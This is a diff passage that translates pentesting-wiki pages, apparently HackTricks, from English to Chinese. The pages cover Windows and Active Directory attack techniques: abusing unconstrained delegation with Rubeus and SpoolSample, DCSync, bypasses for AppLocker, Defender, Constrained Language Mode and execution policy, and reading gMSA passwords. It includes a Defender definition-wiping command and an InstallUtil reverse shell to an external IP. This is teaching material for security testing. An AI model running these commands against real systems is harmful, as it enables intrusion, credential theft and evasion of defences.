-You can **find Computer objects with this attribute** checking if the [userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>) attribute contains [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:
+您可以通过检查[userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>)属性是否包含[ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>)来**查找具有此属性的计算机对象**。您可以使用LDAP过滤器‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’来执行此操作，这正是powerview所做的：
 
 <pre class="language-bash"><code class="lang-bash"># List unconstrained computers
 ## Powerview
@@ -23,34 +23,31 @@ kerberos::list /export #Another way
 # Monitor logins and export new tickets
 .\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #Check every 10s for new TGTs</code></pre>
 
-Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
-More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
-[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
+使用**Mimikatz**或**Rubeus**在内存中加载管理员（或受害者用户）的票证以进行[**票证传递**](pass-the-ticket.md)**。**\
+更多信息：[https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
+[**有关无约束委派的更多信息，请访问ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
 
-### **Force Authentication**
+### **强制身份验证**
 
-If an attacker is able to **compromise a computer allowed for "Unconstrained Delegation"**, he could **trick** a **Print server** to **automatically login** against it **saving a TGT** in the memory of the server.\
-Then, the attacker could perform a **Pass the Ticket attack to impersonate** the user Print server computer account.
-
-To make a print server login against any machine you can use [**SpoolSample**](https://github.com/leechristensen/SpoolSample):
+如果攻击者能够**攻陷允许“无约束委派”的计算机**，他可以**欺骗**一个**打印服务器**，使其**自动登录**并**在服务器的内存中保存TGT**。\
+然后，攻击者可以执行**票证传递攻击以冒充**用户打印服务器计算机帐户。
 
+要使打印服务器登录到任何机器，您可以使用[**SpoolSample**](https://github.com/leechristensen/SpoolSample)：
 ```bash
 .\SpoolSample.exe <printmachine> <unconstrinedmachine>
 ```
+如果 TGT 来自域控制器，您可以执行一个[ **DCSync 攻击**](acl-persistence-abuse/#dcsync)并从 DC 获取所有哈希。\
+[**有关此攻击的更多信息，请访问 ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
 
-If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\
-[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
-
-**Here are other ways to try to force an authentication:**
+**以下是尝试强制身份验证的其他方法：**
 
 {{#ref}}
 printers-spooler-service-abuse.md
 {{#endref}}
 
-### Mitigation
+### 缓解措施
 
-- Limit DA/Admin logins to specific services
-- Set "Account is sensitive and cannot be delegated" for privileged accounts.
+- 限制 DA/Admin 登录到特定服务
+- 为特权账户设置“账户是敏感的，无法被委派”。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md
index aaae81847..b5cf9436d 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -4,22 +4,21 @@
 
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## AppLocker Policy
 
-An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization.
+应用程序白名单是一个经过批准的软件应用程序或可执行文件的列表，这些程序被允许在系统上存在和运行。其目标是保护环境免受有害恶意软件和不符合组织特定业务需求的未批准软件的影响。
 
-[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
-It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**.
+[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) 是微软的 **应用程序白名单解决方案**，为系统管理员提供对 **用户可以运行哪些应用程序和文件** 的控制。它提供对可执行文件、脚本、Windows 安装程序文件、DLL、打包应用程序和打包应用程序安装程序的 **细粒度控制**。\
+组织通常会 **阻止 cmd.exe 和 PowerShell.exe** 以及对某些目录的写入访问，**但这一切都可以被绕过**。
 
 ### Check
 
-Check which files/extensions are blacklisted/whitelisted:
-
+检查哪些文件/扩展名被列入黑名单/白名单：
 ```powershell
 Get-ApplockerPolicy -Effective -xml
 
@@ -28,63 +27,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 $a = Get-ApplockerPolicy -effective
 $a.rulecollections
 ```
-
-This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system:
+此注册表路径包含由 AppLocker 应用的配置和策略，提供了一种查看系统上强制执行的当前规则集的方法：
 
 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
 
-### Bypass
-
-- Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**.
+### 绕过
 
+- 有用的 **可写文件夹** 用于绕过 AppLocker 策略：如果 AppLocker 允许在 `C:\Windows\System32` 或 `C:\Windows` 内执行任何内容，则可以使用 **可写文件夹** 来 **绕过此限制**。
 ```
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
 C:\Windows\Tasks
 C:\windows\tracing
 ```
+- 常见的 **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) 二进制文件也可以用于绕过 AppLocker。
+- **编写不当的规则也可能被绕过**
+- 例如，**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**，您可以在任何地方创建一个 **名为 `allowed` 的文件夹**，它将被允许。
+- 组织通常还会专注于 **阻止 `%System32%\WindowsPowerShell\v1.0\powershell.exe` 可执行文件**，但忘记了 **其他** [**PowerShell 可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)，例如 `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` 或 `PowerShell_ISE.exe`。
+- **DLL 强制执行很少启用**，因为它可能对系统造成额外负担，并且需要大量测试以确保不会出现故障。因此，使用 **DLL 作为后门将有助于绕过 AppLocker**。
+- 您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过 AppLocker。有关更多信息，请查看: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
 
-- Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
-- **Poorly written rules could also be bypassed**
-  - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed.
-  - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`.
-- **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**.
-- You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
+## 凭据存储
 
-## Credentials Storage
+### 安全账户管理器 (SAM)
 
-### Security Accounts Manager (SAM)
+本地凭据存储在此文件中，密码经过哈希处理。
 
-Local credentials are present in this file, the passwords are hashed.
+### 本地安全机构 (LSA) - LSASS
 
-### Local Security Authority (LSA) - LSASS
+**凭据**（哈希）被 **保存** 在此子系统的 **内存** 中，以实现单点登录。\
+**LSA** 管理本地 **安全策略**（密码策略、用户权限...）、**身份验证**、**访问令牌**...\
+LSA 将是 **检查** 提供的凭据的 **SAM** 文件（用于本地登录）并 **与** **域控制器** 进行通信以验证域用户。
 
-The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
-**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
-LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
+**凭据** 被 **保存** 在 **进程 LSASS** 中：Kerberos 票证、NT 和 LM 哈希、易于解密的密码。
 
-The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
+### LSA 秘密
 
-### LSA secrets
+LSA 可以在磁盘上保存一些凭据：
 
-LSA could save in disk some credentials:
-
-- Password of the computer account of the Active Directory (unreachable domain controller).
-- Passwords of the accounts of Windows services
-- Passwords for scheduled tasks
-- More (password of IIS applications...)
+- Active Directory 的计算机帐户密码（无法访问的域控制器）。
+- Windows 服务帐户的密码
+- 计划任务的密码
+- 更多（IIS 应用程序的密码...）
 
 ### NTDS.dit
 
-It is the database of the Active Directory. It is only present in Domain Controllers.
+这是 Active Directory 的数据库。它仅存在于域控制器中。
 
 ## Defender
 
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**.
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) 是 Windows 10 和 Windows 11 以及 Windows Server 版本中可用的防病毒软件。它 **阻止** 常见的渗透测试工具，如 **`WinPEAS`**。然而，有一些方法可以 **绕过这些保护**。
 
-### Check
+### 检查
 
-To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active):
+要检查 **Defender** 的 **状态**，您可以执行 PS cmdlet **`Get-MpComputerStatus`**（检查 **`RealTimeProtectionEnabled`** 的值以了解它是否处于活动状态）：
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -103,8 +99,7 @@ NISEngineVersion                : 0.0.0.0
 PSComputerName                  :
 </code></pre>
 
-To enumerate it you could also run:
-
+要枚举它，您还可以运行：
 ```bash
 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
 wmic /namespace:\\root\securitycenter2 path antivirusproduct
@@ -113,113 +108,101 @@ sc query windefend
 #Delete all rules of Defender (useful for machines without internet access)
 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
+## 加密文件系统 (EFS)
 
-## Encrypted File System (EFS)
+EFS 通过加密保护文件，使用称为 **文件加密密钥 (FEK)** 的 **对称密钥**。该密钥使用用户的 **公钥** 进行加密，并存储在加密文件的 $EFS **替代数据流** 中。当需要解密时，使用用户数字证书的相应 **私钥** 从 $EFS 流中解密 FEK。更多细节可以在 [这里](https://en.wikipedia.org/wiki/Encrypting_File_System) 找到。
 
-EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
+**无需用户启动的解密场景** 包括：
 
-**Decryption scenarios without user initiation** include:
+- 当文件或文件夹移动到非 EFS 文件系统（如 [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table)）时，它们会自动解密。
+- 通过 SMB/CIFS 协议在网络上传输的加密文件在传输前会被解密。
 
-- When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted.
-- Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission.
+这种加密方法允许所有者对加密文件进行 **透明访问**。然而，仅仅更改所有者的密码并登录并不能允许解密。
 
-This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption.
+**关键要点**：
 
-**Key Takeaways**:
+- EFS 使用对称 FEK，使用用户的公钥加密。
+- 解密使用用户的私钥访问 FEK。
+- 在特定条件下会自动解密，例如复制到 FAT32 或网络传输。
+- 加密文件对所有者可访问，无需额外步骤。
 
-- EFS uses a symmetric FEK, encrypted with the user's public key.
-- Decryption employs the user's private key to access the FEK.
-- Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission.
-- Encrypted files are accessible to the owner without additional steps.
+### 检查 EFS 信息
 
-### Check EFS info
+检查 **用户** 是否 **使用** 了此 **服务**，检查此路径是否存在：`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
+使用 cipher /c \<file\> 检查 **谁** 有 **访问** 文件的权限\
+您还可以在文件夹内使用 `cipher /e` 和 `cipher /d` 来 **加密** 和 **解密** 所有文件
 
-Check **who** has **access** to the file using cipher /c \<file>\
-You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
+### 解密 EFS 文件
 
-### Decrypting EFS files
+#### 成为权限系统
 
-#### Being Authority System
+这种方式要求 **受害者用户** 在主机内 **运行** 一个 **进程**。如果是这种情况，使用 `meterpreter` 会话可以模拟用户进程的令牌（`incognito` 中的 `impersonate_token`）。或者您可以直接 `migrate` 到用户的进程。
 
-This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
-
-#### Knowing the users password
+#### 知道用户的密码
 
 {% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
 
-## Group Managed Service Accounts (gMSA)
+## 组管理服务账户 (gMSA)
 
-Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution:
+微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户（通常启用“**密码永不过期**”设置）不同，gMSA 提供了更安全和可管理的解决方案：
 
-- **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates.
-- **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security.
-- **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers.
-- **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks.
-- **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management.
+- **自动密码管理**：gMSA 使用复杂的 240 字符密码，自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理，消除了手动更新密码的需要。
+- **增强安全性**：这些账户免受锁定，并且不能用于交互式登录，从而增强了安全性。
+- **多主机支持**：gMSA 可以在多个主机之间共享，非常适合在多个服务器上运行的服务。
+- **计划任务能力**：与管理服务账户不同，gMSA 支持运行计划任务。
+- **简化 SPN 管理**：当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时，系统会自动更新服务主体名称 (SPN)，简化 SPN 管理。
 
-The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'.
+gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中，并由域控制器 (DC) 每 30 天自动重置。此密码是一个加密数据块，称为 [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)，只能由授权管理员和安装 gMSA 的服务器检索，从而确保安全环境。要访问此信息，需要安全连接，如 LDAPS，或连接必须经过“密封和安全”认证。
 
 ![https://cube0x0.github.io/Relaying-for-gMSA/](../images/asd1.png)
 
-You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
-
+您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**：
 ```
 /GMSAPasswordReader --AccountName jkohler
 ```
+[**在此帖子中找到更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
 
-[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
-
-Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
+此外，请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**。
 
 ## LAPS
 
-The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), enables the management of local Administrator passwords. These passwords, which are **randomized**, unique, and **regularly changed**, are stored centrally in Active Directory. Access to these passwords is restricted through ACLs to authorized users. With sufficient permissions granted, the ability to read local admin passwords is provided.
+**本地管理员密码解决方案 (LAPS)**，可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载，允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的，集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后，可以读取本地管理员密码。
 
 {{#ref}}
 active-directory-methodology/laps.md
 {{#endref}}
 
-## PS Constrained Language Mode
+## PS受限语言模式
 
-PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more.
-
-### **Check**
+PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多**有效使用PowerShell所需的功能，例如阻止COM对象，仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
 
+### **检查**
 ```powershell
 $ExecutionContext.SessionState.LanguageMode
 #Values could be: FullLanguage or ConstrainedLanguage
 ```
-
-### Bypass
-
+### 绕过
 ```powershell
 #Easy bypass
 Powershell -version 2
 ```
+在当前的Windows中，绕过方法将不起作用，但您可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
+**要编译它，您可能需要** **添加引用** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
 
-In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
-**To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
-
-#### Direct bypass:
-
+#### 直接绕过：
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
 ```
-
-#### Reverse shell:
-
+#### 反向 shell:
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
 ```
+您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过受限模式。有关更多信息，请查看：[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
 
-You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
-
-## PS Execution Policy
-
-By default it is set to **restricted.** Main ways to bypass this policy:
+## PS 执行策略
 
+默认情况下，它设置为 **restricted.** 绕过此策略的主要方法：
 ```powershell
 1º Just copy and paste inside the interactive PS console
 2º Read en Exec
@@ -239,33 +222,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
 9º Use EncodeCommand
 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
 ```
+更多信息可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到。
 
-More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
+## 安全支持提供者接口 (SSPI)
 
-## Security Support Provider Interface (SSPI)
+是用于验证用户的 API。
 
-Is the API that can be use to authenticate users.
+SSPI 将负责为想要通信的两台机器找到合适的协议。首选方法是 Kerberos。然后，SSPI 将协商使用哪个认证协议，这些认证协议称为安全支持提供者 (SSP)，以 DLL 形式位于每台 Windows 机器内部，且两台机器必须支持相同的协议才能进行通信。
 
-The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
+### 主要 SSPs
 
-### Main SSPs
+- **Kerberos**: 首选
+- %windir%\Windows\System32\kerberos.dll
+- **NTLMv1** 和 **NTLMv2**: 兼容性原因
+- %windir%\Windows\System32\msv1_0.dll
+- **Digest**: Web 服务器和 LDAP，密码以 MD5 哈希形式
+- %windir%\Windows\System32\Wdigest.dll
+- **Schannel**: SSL 和 TLS
+- %windir%\Windows\System32\Schannel.dll
+- **Negotiate**: 用于协商使用的协议（Kerberos 或 NTLM，默认是 Kerberos）
+- %windir%\Windows\System32\lsasrv.dll
 
-- **Kerberos**: The preferred one
-  - %windir%\Windows\System32\kerberos.dll
-- **NTLMv1** and **NTLMv2**: Compatibility reasons
-  - %windir%\Windows\System32\msv1_0.dll
-- **Digest**: Web servers and LDAP, password in form of a MD5 hash
-  - %windir%\Windows\System32\Wdigest.dll
-- **Schannel**: SSL and TLS
-  - %windir%\Windows\System32\Schannel.dll
-- **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
-  - %windir%\Windows\System32\lsasrv.dll
+#### 协商可以提供多种方法或仅提供一种。
 
-#### The negotiation could offer several methods or only one.
+## UAC - 用户帐户控制
 
-## UAC - User Account Control
-
-[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**.
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能。
 
 {{#ref}}
 windows-security-controls/uac-user-account-control.md
@@ -274,12 +256,11 @@ windows-security-controls/uac-user-account-control.md
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ---
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 64df480dd..0e8a237b2 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -4,22 +4,21 @@
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## AppLocker Policy
 
-An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization.
+应用程序白名单是一个经过批准的软件应用程序或可执行文件的列表，这些程序被允许在系统上存在和运行。其目标是保护环境免受有害恶意软件和不符合组织特定业务需求的未批准软件的影响。
 
-[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
-It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**.
+[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) 是微软的 **应用程序白名单解决方案**，为系统管理员提供对 **用户可以运行哪些应用程序和文件** 的控制。它提供对可执行文件、脚本、Windows 安装程序文件、DLL、打包应用程序和打包应用程序安装程序的 **细粒度控制**。\
+组织通常会 **阻止 cmd.exe 和 PowerShell.exe** 以及对某些目录的写入访问，**但这一切都可以被绕过**。
 
 ### Check
 
-Check which files/extensions are blacklisted/whitelisted:
-
+检查哪些文件/扩展名被列入黑名单/白名单：
 ```powershell
 Get-ApplockerPolicy -Effective -xml
 
@@ -28,63 +27,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 $a = Get-ApplockerPolicy -effective
 $a.rulecollections
 ```
-
-This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system:
+此注册表路径包含由 AppLocker 应用的配置和策略，提供了一种查看系统上强制执行的当前规则集的方法：
 
 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
 
-### Bypass
-
-- Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**.
+### 绕过
 
+- 有用的 **可写文件夹** 用于绕过 AppLocker 策略：如果 AppLocker 允许在 `C:\Windows\System32` 或 `C:\Windows` 内执行任何内容，则可以使用 **可写文件夹** 来 **绕过此限制**。
 ```
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
